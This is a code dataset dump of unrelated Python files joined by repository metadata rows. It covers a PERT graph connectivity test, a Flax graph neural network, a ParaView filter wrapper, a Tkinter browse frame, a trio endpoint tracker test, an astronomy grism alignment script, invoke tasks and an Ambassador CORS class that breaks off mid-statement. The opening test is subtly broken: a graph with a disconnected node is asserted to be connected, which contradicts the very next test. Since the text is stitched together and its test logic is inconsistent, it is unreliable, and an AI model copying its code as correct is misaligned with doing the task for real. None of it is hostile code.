    """Connectivity checks for GraphConnectivityDFS over small PERT graphs."""

    def test_connected_graph(self):
        # A <- B, A <- C: every node reachable from the root.
        pert = PertGraph()
        pert._add_node(key='A', dependencies=[])
        pert._add_node(key='B', dependencies=['A'])
        pert._add_node(key='C', dependencies=[])

        checker = GraphConnectivityDFS(pert)
        self.assertEqual(True, checker.is_connected())

    def test_not_connected_graph(self):
        # 'C' has no dependency edge, leaving it disconnected.
        pert = PertGraph()
        pert._add_node(key='A', dependencies=[])
        pert._add_node(key='B', dependencies=['A'])
        pert._add_node(key='C', dependencies=[])

        checker = GraphConnectivityDFS(pert)
        self.assertEqual(False, checker.is_connected())
        self.assertEqual(['C'], checker.get_not_connected_nodes())
if __name__ == '__main__':
unittest.main()
| 33.166667 | 77 | 0.698492 |
b026f3f70aa60079b4b5c20a97cba36830217521 | 6,732 | py | Python | examples/ogbg_molpcba/models.py | berndbohnet/flax | 5aa7f335bb8819088c8b1aa89aa459c99eb00c1c | [
"Apache-2.0"
] | 1 | 2022-02-27T13:50:55.000Z | 2022-02-27T13:50:55.000Z | examples/ogbg_molpcba/models.py | berndbohnet/flax | 5aa7f335bb8819088c8b1aa89aa459c99eb00c1c | [
"Apache-2.0"
] | null | null | null | examples/ogbg_molpcba/models.py | berndbohnet/flax | 5aa7f335bb8819088c8b1aa89aa459c99eb00c1c | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition of the GNN model."""
from typing import Callable, Sequence
from flax import linen as nn
import jax.numpy as jnp
import jraph
def add_graphs_tuples(graphs: jraph.GraphsTuple,
                      other_graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:
  """Adds the nodes, edges and global features from other_graphs to graphs."""
  summed_fields = {
      field: getattr(graphs, field) + getattr(other_graphs, field)
      for field in ('nodes', 'edges', 'globals')
  }
  return graphs._replace(**summed_fields)
class MLP(nn.Module):
  """A multi-layer perceptron: Dense -> activation -> Dropout per layer."""

  feature_sizes: Sequence[int]
  dropout_rate: float = 0
  deterministic: bool = True
  activation: Callable[[jnp.ndarray], jnp.ndarray] = nn.relu

  @nn.compact
  def __call__(self, inputs):
    hidden = inputs
    for num_features in self.feature_sizes:
      hidden = nn.Dense(features=num_features)(hidden)
      hidden = self.activation(hidden)
      hidden = nn.Dropout(
          rate=self.dropout_rate, deterministic=self.deterministic)(hidden)
    return hidden
class GraphNet(nn.Module):
  """A complete Graph Network model defined with Jraph."""

  latent_size: int
  num_mlp_layers: int
  message_passing_steps: int
  output_globals_size: int
  dropout_rate: float = 0
  skip_connections: bool = True
  use_edge_model: bool = True
  layer_norm: bool = True
  deterministic: bool = True

  def _update_fn(self):
    """Builds one MLP-based update function over concatenated inputs."""
    return jraph.concatenated_args(
        MLP([self.latent_size] * self.num_mlp_layers,
            dropout_rate=self.dropout_rate,
            deterministic=self.deterministic))

  @nn.compact
  def __call__(self, graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:
    # Linearly project the original features into the latent space.
    processed = jraph.GraphMapFeatures(
        embed_node_fn=nn.Dense(self.latent_size),
        embed_edge_fn=nn.Dense(self.latent_size),
        embed_global_fn=nn.Dense(self.latent_size))(graphs)

    # One full Graph Network per message-passing round.
    for _ in range(self.message_passing_steps):
      edge_fn = self._update_fn() if self.use_edge_model else None
      step = jraph.GraphNetwork(
          update_edge_fn=edge_fn,
          update_node_fn=self._update_fn(),
          update_global_fn=self._update_fn())

      if self.skip_connections:
        processed = add_graphs_tuples(step(processed), processed)
      else:
        processed = step(processed)

      if self.layer_norm:
        processed = processed._replace(
            nodes=nn.LayerNorm()(processed.nodes),
            edges=nn.LayerNorm()(processed.edges),
            globals=nn.LayerNorm()(processed.globals),
        )

    # Graph-level predictions live in globals; decode them to output logits.
    return jraph.GraphMapFeatures(
        embed_global_fn=nn.Dense(self.output_globals_size))(processed)
class GraphConvNet(nn.Module):
  """A Graph Convolution Network + Pooling model defined with Jraph."""

  latent_size: int
  num_mlp_layers: int
  message_passing_steps: int
  output_globals_size: int
  dropout_rate: float = 0
  skip_connections: bool = True
  layer_norm: bool = True
  deterministic: bool = True
  pooling_fn: Callable[[jnp.ndarray, jnp.ndarray, jnp.ndarray],
                       jnp.ndarray] = jraph.segment_mean

  def pool(self, graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:
    """Pooling operation, taken from Jraph."""
    # Equivalent to jnp.sum(n_node), but JIT-able.
    total_nodes = graphs.nodes.shape[0]
    num_graphs = graphs.n_node.shape[0]
    # Map each node index to the graph it belongs to; e.g. n_node=[1, 2]
    # yields segment ids [0, 1, 1].
    segment_ids = jnp.repeat(
        jnp.arange(num_graphs),
        graphs.n_node,
        axis=0,
        total_repeat_length=total_nodes)
    # Aggregate the nodes of each graph into its global features.
    pooled = self.pooling_fn(graphs.nodes, segment_ids, num_graphs)
    return graphs._replace(globals=pooled)

  @nn.compact
  def __call__(self, graphs: jraph.GraphsTuple) -> jraph.GraphsTuple:
    # Linearly project the original node features as 'embeddings'.
    processed = jraph.GraphMapFeatures(
        embed_node_fn=nn.Dense(self.latent_size))(graphs)

    # Apply the GCN once for each message-passing round.
    for _ in range(self.message_passing_steps):
      node_fn = jraph.concatenated_args(
          MLP([self.latent_size] * self.num_mlp_layers,
              dropout_rate=self.dropout_rate,
              deterministic=self.deterministic))
      conv = jraph.GraphConvolution(
          update_node_fn=node_fn, add_self_edges=True)

      if self.skip_connections:
        processed = add_graphs_tuples(conv(processed), processed)
      else:
        processed = conv(processed)

      if self.layer_norm:
        processed = processed._replace(
            nodes=nn.LayerNorm()(processed.nodes),
        )

    # Pool node features into a single per-graph embedding.
    processed = self.pool(processed)

    # Decode the pooled embedding into the required output logits.
    return jraph.GraphMapFeatures(
        embed_global_fn=nn.Dense(self.output_globals_size))(processed)
| 35.431579 | 80 | 0.702763 |
314159a2e4c98b3f0a42c91d9c05a02d9588bba3 | 4,897 | py | Python | packages/seacas/libraries/ioss/src/visualization/catalyst/phactori/Operation/PhactoriExtractComponentOperation.py | tokusanya/seacas | 54d9c3b68508ca96e3db1fd00c5d84a810fb330b | [
"Zlib",
"NetCDF",
"MIT",
"BSL-1.0",
"X11",
"BSD-3-Clause"
] | null | null | null | packages/seacas/libraries/ioss/src/visualization/catalyst/phactori/Operation/PhactoriExtractComponentOperation.py | tokusanya/seacas | 54d9c3b68508ca96e3db1fd00c5d84a810fb330b | [
"Zlib",
"NetCDF",
"MIT",
"BSL-1.0",
"X11",
"BSD-3-Clause"
] | null | null | null | packages/seacas/libraries/ioss/src/visualization/catalyst/phactori/Operation/PhactoriExtractComponentOperation.py | tokusanya/seacas | 54d9c3b68508ca96e3db1fd00c5d84a810fb330b | [
"Zlib",
"NetCDF",
"MIT",
"BSL-1.0",
"X11",
"BSD-3-Clause"
] | null | null | null | # Copyright(C) 1999-2020 National Technology & Engineering Solutions
# of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525 with
# NTESS, the U.S. Government retains certain rights in this software.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of NTESS nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from phactori import *
from paraview.simple import *
#phactori_combine_to_single_python_file_subpiece_begin_1
class PhactoriExtractComponentOperation(PhactoriOperationSpecifics):
    """Wraps ParaView's ExtractComponent filter for a phactori pipeline."""

    # Accepted 'input array type' json values mapped onto the ParaView
    # association names used by ExtractComponent.InputArray.
    _ARRAY_TYPE_MAP = {
        "points": "POINTS",
        "cells": "CELLS",
        "nodes": "POINTS",
        "elements": "CELLS",
    }

    def __init__(self):
        PhactoriOperationSpecifics.__init__(self)
        self.Component = 0
        self.InputArrayName = "None"
        self.InputArrayCellsOrPoints = "POINTS"
        self.OutputArrayName = "Result"

    def ParseParametersFromJson(self, inJson):
        """Reads component / input-array settings from the operation json."""
        if "component" in inJson:
            self.Component = inJson["component"]
        if "output array name" in inJson:
            self.OutputArrayName = inJson["output array name"]

        missingKeysMsg = (
            "PhactoriExtractComponentOperation:ParseParametersFromJson\n"
            "must have keys 'input array name' and 'input array type'\n")

        if "input array name" in inJson:
            self.InputArrayName = inJson["input array name"]
        else:
            myDebugPrint3AndException(missingKeysMsg)

        if "input array type" in inJson:
            typeval = inJson["input array type"]
            if typeval in self._ARRAY_TYPE_MAP:
                self.InputArrayCellsOrPoints = self._ARRAY_TYPE_MAP[typeval]
            else:
                myDebugPrint3AndException(
                    "PhactoriExtractComponentOperation:ParseParametersFromJson\n"
                    "'input array type' must be 'points' 'cells' 'nodes' or 'elements'\n")
        else:
            myDebugPrint3AndException(missingKeysMsg)

    def CreateParaViewFilter(self, inInputFilter):
        """Builds and returns the ParaView ExtractComponent filter."""
        if PhactoriDbg(100):
            myDebugPrint3("PhactoriExtractComponentOperation:CreateParaViewFilter entered\n", 100)
        # info in block class should already be parsed and checked
        if PhactoriDbg(100):
            myDebugPrint3("about to call UpdatePipelineWithCurrentTimeArgument\n", 100)
        UpdatePipelineWithCurrentTimeArgument(inInputFilter)

        priorSource = GetActiveSource()

        extractFilter = ExtractComponent(Input = inInputFilter)
        extractFilter.Component = self.Component
        extractFilter.OutputArrayName = self.OutputArrayName
        extractFilter.InputArray = [self.InputArrayCellsOrPoints, self.InputArrayName]

        if PhactoriDbg(100):
            myDebugPrint3(
                "newParaViewFilter.Component" + str(extractFilter.Component) + "\n"
                "newParaViewFilter.OutputArrayName" + str(extractFilter.OutputArrayName) + "\n"
                "newParaViewFilter.InputArray" + str(extractFilter.InputArray) + "\n", 100)

        SetActiveSource(extractFilter)
        if PhactoriDbg(100):
            myDebugPrint3("about to call UpdatePipelineWithCurrentTimeArgument\n", 100)
        UpdatePipelineWithCurrentTimeArgument(extractFilter)
        # restore whatever was active before we built the filter
        SetActiveSource(priorSource)

        if PhactoriDbg(100):
            myDebugPrint3("PhactoriExtractComponentOperation.CreateParaViewFilter returning\n", 100)
        return extractFilter
#phactori_combine_to_single_python_file_subpiece_end_1
| 42.582609 | 94 | 0.745967 |
4b72fc6b03a428c81cd8655c1959f243201c8cea | 3,790 | py | Python | libs/dustUI/dustFrameBrowse.py | minarady1/blink-1 | 4453cf9a9bc4f4ba72b48f569ab9b33d5de177a0 | [
"BSD-3-Clause"
] | 2 | 2021-03-03T05:03:56.000Z | 2021-03-03T05:03:58.000Z | libs/dustUI/dustFrameBrowse.py | minarady1/blink-1 | 4453cf9a9bc4f4ba72b48f569ab9b33d5de177a0 | [
"BSD-3-Clause"
] | 104 | 2016-04-10T19:22:20.000Z | 2018-11-20T15:47:14.000Z | libs/smartmeshsdk-REL-1.3.0.1/libs/dustUI/dustFrameBrowse.py | realms-team/solmanager | 95fa049df041add5f8d37c053ef560d0e5d06dff | [
"BSD-3-Clause"
] | 2 | 2019-03-13T11:43:04.000Z | 2019-04-30T13:54:52.000Z | #!/usr/bin/python
#============================ adjust path =====================================
import sys
import os
if __name__ == '__main__':
here = sys.path[0]
sys.path.insert(0, os.path.join(here, '..'))
#============================ logging =========================================
import logging
class NullHandler(logging.Handler):
    """Logging handler that silently discards every record."""

    def emit(self, record):
        # Intentionally a no-op: drop the record on the floor.
        pass
log = logging.getLogger('dustFrameBrowse')
log.setLevel(logging.INFO)
log.addHandler(NullHandler())
#============================ imports =========================================
import Tkinter
import tkFileDialog
import dustGuiLib
import dustFrame
from dustStyle import dustStyle
#============================ body ============================================
class dustFrameBrowse(dustFrame.dustFrame):
    """Frame holding a single 'browse' button that lets the user pick one
    or several files and hands the selection to a callback."""

    def __init__(self,parentElem,guiLock,selected_cb,allowMultipleFiles=True,frameName="browse",row=0,column=0):
        # record variables
        self.selected_cb = selected_cb          # called with the tuple of selected paths
        self.allowMultipleFiles = allowMultipleFiles

        # init parent
        dustFrame.dustFrame.__init__(self,parentElem,guiLock,frameName,row,column)

        #====
        # browse button
        self.browseButton = dustGuiLib.Button(self.container,
                                              text='browse',
                                              command=self._browse)
        self._add(self.browseButton,0,0)

    #======================== public ==========================================

    #======================== private =========================================

    def _browse(self):
        '''
        \brief Browse button clicked; have the user select a number of files.
        '''

        if self.allowMultipleFiles:
            title = 'Select multiple files'
        else:
            title = 'Select a single file'

        # open file-selection dialog
        # BUGFIX: the computed title was previously dead — the dialog always
        # used the hard-coded 'Select a file'; now it reflects the mode.
        selectedFiles = tkFileDialog.askopenfilenames(
            title       = title,
            multiple    = self.allowMultipleFiles,
            filetypes   = [
                ("All types", "*.*"),
            ]
        )

        # workaround for http://bugs.python.org/issue5712: on some platforms
        # the dialog returns one Tcl-formatted string instead of a tuple
        if isinstance(selectedFiles, (str, unicode)):
            selectedFiles = self.tk.splitlist(selectedFiles)

        # log
        log.debug("user selected {0}".format([f.split('/')[-1] for f in selectedFiles]))

        # call the callback
        self.selected_cb(selectedFiles)
#============================ sample app ======================================
# The following gets called only if you run this module as a standalone app, by
# double-clicking on this source file. This code is NOT executed when importing
# this module is a larger application
#
class exampleApp(object):
def __init__(self):
self.window = dustWindow("dustFrameLBRConnection",
self._closeCb)
self.guiLock = threading.Lock()
self.frame = dustFrameBrowse(
self.window,
self.guiLock,
self._dustFrameBrowse_selected_cb,
row=0,column=0)
self.frame.show()
self.window.mainloop()
def _closeCb(self):
print " _closeCb called"
def _dustFrameBrowse_selected_cb(self,filenames):
print "user selected the following files: {0}".format(filenames)
if __name__ == '__main__':
import threading
from dustWindow import dustWindow
exampleApp() | 33.839286 | 112 | 0.485488 |
f2c2fb61d1061f3c60a8bca0954516891decbfb7 | 2,094 | py | Python | tests-trio/p2p-trio/test_endpoint_tracker.py | teotoplak/trinity | 6c67b5debfb94f74d0162c70f92ae3d13918b174 | [
"MIT"
] | 3 | 2019-06-17T13:59:20.000Z | 2021-05-02T22:09:13.000Z | tests-trio/p2p-trio/test_endpoint_tracker.py | teotoplak/trinity | 6c67b5debfb94f74d0162c70f92ae3d13918b174 | [
"MIT"
] | 2 | 2019-04-30T06:22:12.000Z | 2019-06-14T04:27:18.000Z | tests-trio/p2p-trio/test_endpoint_tracker.py | teotoplak/trinity | 6c67b5debfb94f74d0162c70f92ae3d13918b174 | [
"MIT"
] | 2 | 2019-12-14T02:52:32.000Z | 2021-02-18T23:04:44.000Z | import pytest
import trio
from trio.testing import (
wait_all_tasks_blocked,
)
import pytest_trio
from p2p.trio_service import (
background_service,
)
from p2p.tools.factories.discovery import (
EndpointFactory,
EndpointVoteFactory,
ENRFactory,
)
from p2p.tools.factories.keys import (
PrivateKeyFactory,
)
from p2p.discv5.constants import (
IP_V4_ADDRESS_ENR_KEY,
UDP_PORT_ENR_KEY,
)
from p2p.discv5.endpoint_tracker import (
EndpointTracker,
)
from p2p.discv5.enr_db import (
MemoryEnrDb,
)
from p2p.discv5.identity_schemes import (
default_identity_scheme_registry,
)
@pytest.fixture
def private_key():
return PrivateKeyFactory().to_bytes()
@pytest.fixture
def initial_enr(private_key):
return ENRFactory(
private_key=private_key,
)
@pytest_trio.trio_fixture
async def enr_db(initial_enr):
enr_db = MemoryEnrDb(default_identity_scheme_registry)
await enr_db.insert(initial_enr)
return enr_db
@pytest.fixture
def vote_channels():
return trio.open_memory_channel(0)
@pytest.fixture
async def endpoint_tracker(private_key, initial_enr, enr_db, vote_channels):
endpoint_tracker = EndpointTracker(
local_private_key=private_key,
local_node_id=initial_enr.node_id,
enr_db=enr_db,
identity_scheme_registry=default_identity_scheme_registry,
vote_receive_channel=vote_channels[1],
)
async with background_service(endpoint_tracker):
yield endpoint_tracker
@pytest.mark.trio
async def test_endpoint_tracker_updates_enr(endpoint_tracker, initial_enr, enr_db, vote_channels):
endpoint = EndpointFactory()
endpoint_vote = EndpointVoteFactory(endpoint=endpoint)
await vote_channels[0].send(endpoint_vote)
await wait_all_tasks_blocked() # wait until vote has been processed
updated_enr = await enr_db.get(initial_enr.node_id)
assert updated_enr.sequence_number == initial_enr.sequence_number + 1
assert updated_enr[IP_V4_ADDRESS_ENR_KEY] == endpoint.ip_address
assert updated_enr[UDP_PORT_ENR_KEY] == endpoint.port
| 24.068966 | 98 | 0.765043 |
c6f7ef04035cf05bb8e3e49103a54116d00cab72 | 6,613 | py | Python | sandbox/src1/VG.py | sniemi/SamPy | e048756feca67197cf5f995afd7d75d8286e017b | [
"BSD-2-Clause"
] | 5 | 2016-05-28T14:12:28.000Z | 2021-04-22T10:23:12.000Z | sandbox/src1/VG.py | sniemi/SamPy | e048756feca67197cf5f995afd7d75d8286e017b | [
"BSD-2-Clause"
] | null | null | null | sandbox/src1/VG.py | sniemi/SamPy | e048756feca67197cf5f995afd7d75d8286e017b | [
"BSD-2-Clause"
] | 2 | 2015-07-13T10:04:10.000Z | 2021-04-22T10:23:23.000Z | # this is module VG
### JHT: if you have to update this module, then also
### check for possible updates in the other modules HG, VG, HS, VS
import os,math
import Tkinter as Tk
from tiasgatfuncs import *
def doit(fn,dp,mt):
    """ JHT: this is the module that analyses an ALFOSC pinhole spectrum
    with a Vertical Grism, and recommends an alignment offset to the
    current GRISM WHEEL stepper motor units."""
    # Parameters (from call sites in tiasgat -- TODO confirm):
    #   fn: FITS file name without the ".fits" extension
    #   dp: directory path prefix prepended to fn (presumably ends in '/')
    #   mt: message/text widget handed to messageOut() for user feedback
    # Returns a one-line human-readable result / error string.
    ## First check if data file exists
    if not os.access(dp+fn+".fits",os.F_OK):
        messageOut(mt,"File not found: "+dp+fn+".fits\n")
        return "File not found: "+dp+fn+".fits"
    messageOut(mt,"\nVertical-Grism analysis of file: "+dp+fn+".fits\n")
    # PyRAF is imported lazily so this module can load without IRAF present.
    from pyraf import iraf
    from pyraf import gwm
    ## Read current grism wheel position from image FITS header
    iraf.images.imutil.imgets(dp+fn,"GRISM")
    grismid=iraf.images.imutil.imgets.value
    if grismid.find("Grism")==-1:
        iraf.images.imutil.imgets(dp+fn,"FILTER") # maybe in filter wheel?
        grismid=iraf.images.imutil.imgets.value
        if grismid.find("Grism")==-1:
            messageOut(mt,"Vertical-Grism mode: no vertical grism in wheel\n")
            return "File %s: Vertical-Grism mode: no vertical grism in wheel" % fn
    ## Read current aperture wheel position from image FITS header
    iraf.images.imutil.imgets(dp+fn,"APERTUR")
    slitid=iraf.images.imutil.imgets.value
    # 'inho' matches both "Pinhole" and "pinhole" spellings in the header
    if slitid.find("inho")==-1:
        messageOut(mt,"Vertical-Grism mode: no pinhole in aperture wheel\n")
        return "File %s: Vertical-Grism mode: no pinhole in aperture wheel" % fn
    # Load the IRAF packages needed for aperture finding/tracing (quietly).
    iraf.noao(_doprint=0)
    iraf.noao.imred(_doprint=0)
    iraf.noao.imred.specred(_doprint=0)
    # Scratch area for IRAF database/plot/log files; wiped of stale output.
    if not os.access("/tmp/tiasgat/",os.F_OK):
        os.mkdir("/tmp/tiasgat/")
        os.chmod("/tmp/tiasgat/",0777)
    if os.access("/tmp/tiasgat/plot",os.F_OK): os.remove("/tmp/tiasgat/plot")
    if os.access("/tmp/tiasgat/plot2",os.F_OK): os.remove("/tmp/tiasgat/plot2")
    if os.access("/tmp/tiasgat/aplast",os.F_OK): os.remove("/tmp/tiasgat/aplast")
    if os.access("/tmp/tiasgat/tvmarks",os.F_OK): os.remove("/tmp/tiasgat/tvmarks")
    if os.access("/tmp/tiasgat/logfile",os.F_OK): os.remove("/tmp/tiasgat/logfile")
    ## Note that this will *not* update any uparm files !! (see pyraf documentation)
    iraf.noao.imred.specred.dispaxis=2
    iraf.noao.imred.specred.database="/tmp/tiasgat/"
    iraf.noao.imred.specred.plotfile="/tmp/tiasgat/plot"
    iraf.noao.imred.specred.logfile="/tmp/tiasgat/logfile"
    iraf.noao.imred.specred.apedit.width=15
    #iraf.lpar(iraf.noao.imred.specred.aptrace)
    ## Display image on ds9
    iraf.set(stdimage="imt512")
    iraf.display(dp+fn,1,fill="no",Stdout="/dev/null")
    # Suppress IRAF query for number of apertures to find
    # This is only necesary for the widest slits: then the call to
    # apfind results in an empty database file, as it cannot find an aperture.
    # But aptrace works fine anyway (except for the annoying query) !?
    iraf.noao.imred.specred.apfind.setParam('nfind.p_value', 1)
    iraf.noao.imred.specred.apfind.setParam('nfind.p_mode','h')
    ## 'find' and trace spectrum; this will dump a plot to /tmp/tiasgat/plot
    lines = iraf.noao.imred.specred.apfind(dp+fn,nfind=1,interactive="no", Stdout=1)
    for i in range (0,len(lines)): messageOut(mt,lines[i]+"\n")
    # To properly fit grism #3 i need low-rej=2.1 and niter=8
    lines = iraf.noao.imred.specred.aptrace(dp+fn,interactive="no",step=5,low_reject=2.1,
            high_reject=2.1,function="leg",order=2,niterate=8,naverage=1, Stdout=1)
    for i in range (0,len(lines)): messageOut(mt,lines[i]+"\n")
    ## Start graphics window; select the correct plot; show plot
    gwm.window("Tiasgat! graphics")
    iraf.plot.gkiextract("/tmp/tiasgat/plot",2,Stdout="/tmp/tiasgat/plot2")
    gwm.getActiveGraphicsWindow().load("/tmp/tiasgat/plot2")
    ### how to read the aperture file, as output by aptrace ####
    ###
    ### center line 6 gives zero point
    ### max,min lines 24-25 n = (2 * x - (max + min)) / (max - min)
    ### c1,c2 lines 26-27
    ###
    ### The polynomial can be expressed as the sum
    ###
    ### poly = sum from i=1 to order {c_i * z_i}
    ###
    ### where the the c_i are the coefficients and the z_i are defined
    ### interatively as:
    ###
    ### z_1 = 1
    ### z_2 = n
    ### z_i = ((2*i-3) * n * z_{i-1} - (i-2) * z_{i-2}) / (i - 1)
    ###
    ### So for order=2 and for vertical slit/grism: X=center+c1+c2*n
    ### X=center + c1 + c2*(2 * Y - (max + min)) / (max - min)
    ### translated to X=a + bY
    ### a=center + c1 - c2*(max+min)/(max-min)
    ### b=2*C2/(max-min)
    ## Read the aperture definition file
    # NOTE: the fixed line indices below follow the layout documented above
    # and assume aptrace was run with order=2.
    apfile=open("/tmp/tiasgat/ap"+dp.replace('/','_')+fn,'r')
    lines=apfile.readlines()
    apfile.close()
    #print lines[5], lines[23:]
    c0 = float(lines[5].split(None,9)[1].strip())
    lower = float(lines[23].strip())
    upper = float(lines[24].strip())
    c1 = float(lines[25].strip())
    c2 = float(lines[26].strip())
    # Linear trace X = a + b*Y, derived from the Legendre fit (see above).
    a = c0 + c1 - c2*(upper+lower)/(upper-lower)
    b = 2*c2/(upper-lower)
    #print "zeropoint ", a, " slope ",b
    ## Remove aperture definition file
    if os.access("/tmp/tiasgat/ap"+dp.replace('/','_')+fn,os.F_OK):
        os.remove("/tmp/tiasgat/ap"+dp.replace('/','_')+fn)
    ## Mark the fit on the image display
    if os.access("/tmp/tiasgat/tvmarks",os.F_OK): os.remove("/tmp/tiasgat/tvmarks")
    tvmarkfile=open("/tmp/tiasgat/tvmarks",'w')
    # one square marker every 3 rows along the fitted trace
    for i in range(int(lower),int(upper)+1,3):
        tvmarkfile.write(str(a+b*i)+" "+str(i)+" 100 s \n")
    tvmarkfile.close()
    iraf.tv.tvmark(1,"",commands="/tmp/tiasgat/tvmarks",interactive="no")
    ## Read current grism wheel position from image FITS header
    iraf.images.imutil.imgets(dp+fn,"ALGRSTP")
    oldwheelunits=float(iraf.images.imutil.imgets.value)
    #print "GRISMSTE ", oldwheelunits
    ## Read binning FITS headers
    iraf.images.imutil.imgets(dp+fn,"CDELT1")
    xbin=float(iraf.images.imutil.imgets.value)
    iraf.images.imutil.imgets(dp+fn,"CDELT2")
    ybin=float(iraf.images.imutil.imgets.value)
    messageOut(mt,"\nBinning factors "+str(int(xbin))+" x "+str(int(ybin))+"\n")
    ## Correct the angle for the binning factors.
    ## A full wheel turn corresponds to 320000 units
    offsetangle=-320000 * math.atan(b*xbin/ybin) / (2*math.pi)
    messageOut(mt,"Offset to motor units "+str(offsetangle)+"\n")
    newwheelunits=offsetangle + oldwheelunits
    # keep the suggested position within one positive wheel revolution
    if newwheelunits < 0: newwheelunits+=320000
    # +0.5 rounds to the nearest integer unit in the %d formatting
    return "Result for %s : current GRISM wheel units %d, suggested new value %d" % \
        (fn, (0.5+oldwheelunits), (0.5+newwheelunits))
| 37.788571 | 94 | 0.6584 |
3bf75aef975a4f0e6ef65cf81901bcc8f0e7322e | 1,120 | py | Python | tasks/deps.py | ndparker/gensaschema | 36dab1beaecb0f92707b11020a08379958bc516f | [
"Apache-2.0"
] | 3 | 2016-10-25T09:37:19.000Z | 2020-07-21T14:06:00.000Z | tasks/deps.py | ndparker/gensaschema | 36dab1beaecb0f92707b11020a08379958bc516f | [
"Apache-2.0"
] | 2 | 2019-05-23T13:08:56.000Z | 2021-02-25T15:28:41.000Z | tasks/deps.py | ndparker/gensaschema | 36dab1beaecb0f92707b11020a08379958bc516f | [
"Apache-2.0"
] | 3 | 2016-09-02T13:15:05.000Z | 2019-10-01T12:55:10.000Z | # -*- encoding: ascii -*-
"""
Dependencies
~~~~~~~~~~~~
"""
import os as _os
import invoke as _invoke
@_invoke.task()
def old(ctx):
    """Show installed python packages that have newer releases available."""
    command = 'pip list -o'
    with ctx.shell.root_dir():
        ctx.run(command, echo=True)
@_invoke.task()
def package(ctx, upgrade=False):
    """Install runtime dependencies (editable install), optionally upgrading."""
    flag = '-U ' if upgrade else ''
    with ctx.shell.root_dir():
        ctx.run('pip install %s-e .' % (flag,), echo=True)
@_invoke.task(default=True)
def dev(ctx, upgrade=False):
    """Install all python dependencies, development ones included."""
    flag = '-U ' if upgrade else ''
    with ctx.shell.root_dir():
        ctx.run('pip install %s-r development.txt' % (flag,), echo=True)
@_invoke.task()
def reset(ctx, python=False, upgrade=False):
    """Rebuild the virtual env by running reset.sh (flags: -p python, -u upgrade)."""
    parts = ["bash -il %s/reset.sh"]
    if python:
        parts.append('-p')
    if upgrade:
        parts.append('-u')
    parts.append('%s')
    cmd = ' '.join(parts)

    with ctx.shell.root_dir():
        # the cwd must be captured *inside* root_dir(), after any chdir
        pwd = _os.getcwd()
        script_dir = ctx.shell.native(_os.path.dirname(__file__))
        ctx.run(ctx.c(cmd, script_dir, pwd), pty=True)
| 23.333333 | 78 | 0.579464 |
ad34055627c3a4247f415c918048f5c376da89e4 | 2,131 | py | Python | ambassador/ambassador/ir/ircors.py | ewbankkit/ambassador | e693d96a0df01e9e9dce79e98b6cf0fcfd5ae02e | [
"Apache-2.0"
] | 2 | 2019-03-21T03:40:09.000Z | 2019-10-27T07:32:00.000Z | ambassador/ambassador/ir/ircors.py | ewbankkit/ambassador | e693d96a0df01e9e9dce79e98b6cf0fcfd5ae02e | [
"Apache-2.0"
] | 2 | 2021-03-20T05:48:09.000Z | 2021-03-20T05:48:58.000Z | ambassador/ambassador/ir/ircors.py | ewbankkit/ambassador | e693d96a0df01e9e9dce79e98b6cf0fcfd5ae02e | [
"Apache-2.0"
] | null | null | null | from typing import Any, TYPE_CHECKING
from ..config import Config
from ..utils import RichStatus
from .irresource import IRResource
if TYPE_CHECKING:
from .ir import IR
class IRCORS (IRResource):
    """IR resource holding a normalized CORS configuration."""

    def __init__(self, ir: 'IR', aconf: Config,
                 rkey: str="ir.cors",
                 kind: str="IRCORS",
                 name: str="ir.cors",
                 **kwargs) -> None:
        # print("IRCORS __init__ (%s %s %s)" % (kind, name, kwargs))
        super().__init__(
            ir=ir, aconf=aconf, rkey=rkey, kind=kind, name=name,
            **kwargs
        )

    def setup(self, ir: 'IR', aconf: Config) -> bool:
        """Normalize user-supplied CORS fields onto their canonical keys.

        Returns False (after posting an error) when 'origins' is neither a
        list nor a comma-separated string; True otherwise.
        """
        # 'origins' cannot be treated like other keys, because if it's a
        # list, then it remains as is, but if it's a string, then it's
        # converted to a list.
        origins = self.pop('origins', None)

        if origins is not None:
            # isinstance (rather than exact type checks) also accepts
            # list/str subclasses, e.g. YAML-parser specializations.
            if isinstance(origins, list):
                self.allow_origin = origins
            elif isinstance(origins, str):
                self.allow_origin = origins.split(',')
            else:
                self.post_error(RichStatus.fromError("invalid CORS origin - {}".format(origins),
                                                     module=self))
                return False

        # Map user-facing keys onto the canonical CORS field names,
        # flattening list values to comma-separated strings.
        for from_key, to_key in [ ( 'max_age', 'max_age' ),
                                  ( 'credentials', 'allow_credentials' ),
                                  ( 'methods', 'allow_methods' ),
